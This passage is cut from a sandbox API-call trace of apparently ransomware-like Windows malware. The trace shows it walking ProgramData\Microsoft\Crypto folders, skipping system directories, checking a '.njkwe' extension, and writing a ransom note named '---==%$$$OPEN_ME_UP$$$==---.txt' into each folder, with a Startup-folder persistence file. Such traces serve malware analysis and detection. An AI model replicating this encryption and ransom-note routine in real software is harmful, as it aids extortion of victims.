ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd330d8b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 0 [0072.602] FindClose (in: hFindFile=0xc19e20 | out: hFindFile=0xc19e20) returned 1 [0072.602] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 71 [0072.602] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\dss\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0072.602] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0072.603] CloseHandle (hObject=0x430) returned 1 [0072.603] GetProcessHeap () returned 0xbe0000 [0072.603] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0072.603] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd33178c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Keys", cAlternateFileName="")) returned 1 [0072.603] lstrcmpiW (lpString1="Keys", lpString2="Windows") returned -1 [0072.603] lstrcmpiW (lpString1="Keys", lpString2="$Recycle.bin") returned 1 [0072.604] lstrcmpiW (lpString1="Keys", lpString2="System Volume Information") returned -1 [0072.604] lstrcmpiW (lpString1="Keys", lpString2="Program Files") returned -1 [0072.604] lstrcmpiW (lpString1="Keys", lpString2="Program Files (x86)") returned -1 [0072.604] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys") returned 40 [0072.604] lstrcmpW (lpString1="Keys", lpString2=".") returned 1 [0072.604] lstrcmpW (lpString1="Keys", lpString2="..") returned 1 [0072.604] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0072.604] GetProcessHeap () returned 0xbe0000 [0072.604] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0072.604] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\*") returned 42 [0072.604] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd33178c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19f20 [0072.605] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.605] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.605] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.605] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.605] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.605] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\.") returned 42 [0072.605] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.605] StrStrIW (lpFirst=".", lpSrch=".njkwe") returned 0x0 [0072.605] lstrcmpW (lpString1=".", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0072.605] lstrcmpW (lpString1=".", lpString2="taridd") returned -1 [0072.605] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0072.605] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\." (normalized: "c:\\programdata\\microsoft\\crypto\\keys\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.605] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd33178c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0072.605] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.605] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.605] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.605] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.605] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.605] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\..") returned 43 [0072.605] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.605] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.605] StrStrIW (lpFirst="..", lpSrch=".njkwe") returned 0x0 [0072.605] lstrcmpW (lpString1="..", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0072.605] lstrcmpW (lpString1="..", lpString2="taridd") returned -1 [0072.605] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\..", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0072.605] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\.." (normalized: "c:\\programdata\\microsoft\\crypto"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.605] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd33178c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 0 [0072.606] FindClose (in: hFindFile=0xc19f20 | out: hFindFile=0xc19f20) returned 1 [0072.606] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 72 [0072.606] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\keys\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0072.606] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0072.608] CloseHandle (hObject=0x430) returned 1 [0072.608] GetProcessHeap () returned 0xbe0000 [0072.608] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0072.608] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x416372c8, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x416372c8, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="PCPKSP", cAlternateFileName="")) returned 1 [0072.608] lstrcmpiW (lpString1="PCPKSP", lpString2="Windows") returned -1 [0072.608] lstrcmpiW (lpString1="PCPKSP", lpString2="$Recycle.bin") returned 1 [0072.608] lstrcmpiW (lpString1="PCPKSP", lpString2="System Volume Information") returned -1 [0072.608] lstrcmpiW (lpString1="PCPKSP", lpString2="Program Files") returned -1 [0072.608] lstrcmpiW (lpString1="PCPKSP", lpString2="Program Files (x86)") returned -1 [0072.608] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP") returned 42 [0072.608] lstrcmpW (lpString1="PCPKSP", lpString2=".") returned 1 [0072.608] lstrcmpW (lpString1="PCPKSP", lpString2="..") returned 1 [0072.608] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0072.608] GetProcessHeap () returned 0xbe0000 [0072.608] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0072.608] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\*") returned 44 [0072.608] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x416372c8, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x416372c8, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a1e0 [0072.609] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.609] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.609] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.609] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.609] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.609] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\.") returned 44 [0072.609] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.609] FindNextFileW (in: hFindFile=0xc1a1e0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x416372c8, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x416372c8, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0072.609] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.609] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.609] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.609] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.609] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.609] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\..") returned 45 [0072.609] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.610] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.610] FindNextFileW (in: hFindFile=0xc1a1e0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd332abc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="WindowsAIK", cAlternateFileName="WINDOW~1")) returned 1 [0072.610] lstrcmpiW (lpString1="WindowsAIK", lpString2="Windows") returned 1 [0072.610] lstrcmpiW (lpString1="WindowsAIK", lpString2="$Recycle.bin") returned 1 [0072.610] lstrcmpiW (lpString1="WindowsAIK", lpString2="System Volume Information") returned 1 [0072.610] lstrcmpiW (lpString1="WindowsAIK", lpString2="Program Files") returned 1 [0072.610] lstrcmpiW (lpString1="WindowsAIK", lpString2="Program Files (x86)") returned 1 [0072.610] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK") returned 53 [0072.610] lstrcmpW (lpString1="WindowsAIK", lpString2=".") returned 1 [0072.610] lstrcmpW (lpString1="WindowsAIK", lpString2="..") returned 1 [0072.610] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0072.610] GetProcessHeap () returned 0xbe0000 [0072.610] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0072.610] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\*") returned 55 [0072.610] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd332abc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19de0 [0072.610] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.610] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.610] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.610] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.610] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.610] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\.") returned 55 [0072.610] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.610] StrStrIW (lpFirst=".", lpSrch=".njkwe") returned 0x0 [0072.610] lstrcmpW (lpString1=".", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0072.610] lstrcmpW (lpString1=".", lpString2="taridd") returned -1 [0072.610] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0072.610] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\." (normalized: "c:\\programdata\\microsoft\\crypto\\pcpksp\\windowsaik\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.611] FindNextFileW (in: hFindFile=0xc19de0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd332abc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0072.611] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.611] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.611] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.611] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.611] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.611] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\..") returned 56 [0072.611] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.611] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.611] StrStrIW (lpFirst="..", lpSrch=".njkwe") returned 0x0 [0072.611] lstrcmpW (lpString1="..", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0072.611] lstrcmpW (lpString1="..", lpString2="taridd") returned -1 [0072.611] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\..", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0072.611] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\.." (normalized: "c:\\programdata\\microsoft\\crypto\\pcpksp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.611] FindNextFileW (in: hFindFile=0xc19de0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd332abc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 0 [0072.611] FindClose (in: hFindFile=0xc19de0 | out: hFindFile=0xc19de0) returned 1 [0072.611] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 85 [0072.611] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\pcpksp\\windowsaik\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0072.612] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0072.613] CloseHandle (hObject=0x434) returned 1 [0072.613] GetProcessHeap () returned 0xbe0000 [0072.613] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0072.613] FindNextFileW (in: hFindFile=0xc1a1e0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd332abc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="WindowsAIK", cAlternateFileName="WINDOW~1")) returned 0 [0072.613] FindClose (in: hFindFile=0xc1a1e0 | out: hFindFile=0xc1a1e0) returned 1 [0072.613] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 74 [0072.613] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\pcpksp\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0072.613] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0072.614] CloseHandle (hObject=0x430) returned 1 [0072.614] GetProcessHeap () returned 0xbe0000 [0072.614] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0072.614] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x17c6f037, ftLastAccessTime.dwHighDateTime=0x1d2a02b, ftLastWriteTime.dwLowDateTime=0x17c6f037, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RSA", cAlternateFileName="")) returned 1 [0072.614] lstrcmpiW (lpString1="RSA", lpString2="Windows") returned -1 [0072.614] lstrcmpiW (lpString1="RSA", lpString2="$Recycle.bin") returned 1 [0072.614] lstrcmpiW (lpString1="RSA", lpString2="System Volume Information") returned -1 [0072.614] lstrcmpiW (lpString1="RSA", lpString2="Program Files") returned 1 [0072.614] lstrcmpiW (lpString1="RSA", lpString2="Program Files (x86)") returned 1 [0072.614] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA") returned 39 [0072.614] lstrcmpW (lpString1="RSA", lpString2=".") returned 1 [0072.614] lstrcmpW (lpString1="RSA", lpString2="..") returned 1 [0072.615] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0072.615] GetProcessHeap () returned 0xbe0000 [0072.615] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0072.615] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\*") returned 41 [0072.615] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x17c6f037, ftLastAccessTime.dwHighDateTime=0x1d2a02b, ftLastWriteTime.dwLowDateTime=0x77356b64, ftLastWriteTime.dwHighDateTime=0x1d32793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19fe0 [0072.615] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.615] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.615] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.615] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.615] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.615] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\.") returned 41 [0072.615] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.615] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x17c6f037, ftLastAccessTime.dwHighDateTime=0x1d2a02b, ftLastWriteTime.dwLowDateTime=0x77356b64, ftLastWriteTime.dwHighDateTime=0x1d32793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0072.615] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.615] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.615] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.615] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.615] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.615] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\..") returned 42 [0072.615] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.615] lstrcmpW 